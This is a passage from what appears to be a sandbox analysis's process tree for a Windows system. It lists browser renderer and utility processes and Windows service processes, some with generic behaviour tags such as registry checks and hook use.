C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:13⤵PID:7100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:13⤵PID:7888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:13⤵PID:6352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:13⤵PID:6424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:13⤵PID:6368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:83⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:13⤵PID:6872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:13⤵PID:7296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5980 /prefetch:83⤵PID:9052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:13⤵PID:9736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:13⤵PID:7976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:13⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:13⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:13⤵PID:9456
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 9456 -s 12084⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:8324
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:13⤵PID:1352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:13⤵PID:7480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:13⤵PID:7388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:13⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:13⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:13⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:13⤵PID:5008
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:6816
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6776 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 25755 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {064d7bc3-bd76-49c6-ae34-df25fec73f50} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" gpu4⤵PID:5444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 25791 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de7001f-876c-4ae2-80aa-678b1ffacec6} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" socket4⤵PID:4840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3028 -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 3016 -prefsLen 25932 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49ffd600-27c3-45a8-8e45-bb194128739b} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:1944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4192 -childID 2 -isForBrowser -prefsHandle 4184 -prefMapHandle 4144 -prefsLen 31165 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b267c062-31fd-467d-b93f-6ccc5d056d2f} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:8920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4724 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4988 -prefMapHandle 4992 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2130695-4d47-40f4-8de4-b9f2744a948a} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" utility4⤵
- Checks processor information in registry
PID:1144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5260 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c84cb8f-a425-40c1-b814-e64d2abd7d9c} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:10200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5292 -childID 4 -isForBrowser -prefsHandle 5276 -prefMapHandle 5272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97401c3f-93f0-4cec-95a0-ee242772fe25} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:4492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 5 -isForBrowser -prefsHandle 5512 -prefMapHandle 5424 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b615cb1-f312-4a30-8368-de5292c79b3e} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:5876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6060 -childID 6 -isForBrowser -prefsHandle 3056 -prefMapHandle 6052 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3281d4f6-8bdb-44eb-b7fc-d52f3d49b810} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:9404
-
-
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\a623c7b1-d576-4079-b5ac-82e13bd4c8c1.dmp"4⤵PID:3000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7400 -childID 7 -isForBrowser -prefsHandle 4432 -prefMapHandle 4980 -prefsLen 27895 -prefMapSize 244658 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32af96d6-a029-425e-84ce-61ad16114138} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" tab4⤵PID:7196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4936 -parentBuildID 20240401114208 -prefsHandle 1988 -prefMapHandle 6308 -prefsLen 30197 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4068c130-09cd-4d0d-bd9a-82d418bc0062} 6776 "\\.\pipe\gecko-crash-server-pipe.6776" gpu4⤵PID:3776
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:4780
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x11c,0xf4,0x120,0x118,0x124,0x7ffa05b0cc40,0x7ffa05b0cc4c,0x7ffa05b0cc583⤵PID:2908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=1908 /prefetch:23⤵PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=2188 /prefetch:33⤵PID:8856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1376,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=2296 /prefetch:83⤵PID:7732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3188 /prefetch:13⤵PID:2276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3408,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3440 /prefetch:13⤵PID:6928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4692,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4672 /prefetch:13⤵PID:9544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4884 /prefetch:83⤵PID:5772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,1234250103252595151,2619280657283116098,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5032 /prefetch:83⤵PID:6492
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe" --reenable-autoupdates --system-level3⤵PID:5696
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff618204698,0x7ff6182046a4,0x7ff6182046b04⤵PID:3024
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:7240
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:10012
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1944 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1852 -prefsLen 24133 -prefMapSize 245037 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cbb5ecf-5233-46d5-934b-a0765a9582eb} 10012 "\\.\pipe\gecko-crash-server-pipe.10012" gpu4⤵PID:760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20240401114208 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 24133 -prefMapSize 245037 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ef725c8-4a51-417c-ae56-9e1743a774eb} 10012 "\\.\pipe\gecko-crash-server-pipe.10012" socket4⤵PID:4300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3220 -prefsLen 24632 -prefMapSize 245037 -jsInitHandle 1400 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {881be3d6-de78-45c0-a7da-14634420b511} 10012 "\\.\pipe\gecko-crash-server-pipe.10012" tab4⤵PID:7340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -childID 2 -isForBrowser -prefsHandle 3508 -prefMapHandle 3504 -prefsLen 29865 -prefMapSize 245037 -jsInitHandle 1400 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e3068d6-1fcd-4a46-aec0-a7ab51a987b9} 10012 "\\.\pipe\gecko-crash-server-pipe.10012" tab4⤵PID:9260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4808 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4756 -prefMapHandle 4676 -prefsLen 29865 -prefMapSize 245037 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0b76d55-53a8-4bcc-b3f4-c9915fcc767e} 10012 "\\.\pipe\gecko-crash-server-pipe.10012" utility4⤵PID:8896
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3804
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3984
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2056
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1964
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1512
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1572
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3052
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3120
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:1248
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1888
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:5084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4224
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:5312
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:8400
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:8308
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2636
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:7080
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:9232
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:10152
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:8076
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1304
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3060
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:7388
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6060
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1936
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:6032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:8312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6304 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 7032 -ip 70322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9860
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 492 -p 1272 -ip 12722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6948
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 6280 -ip 62802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
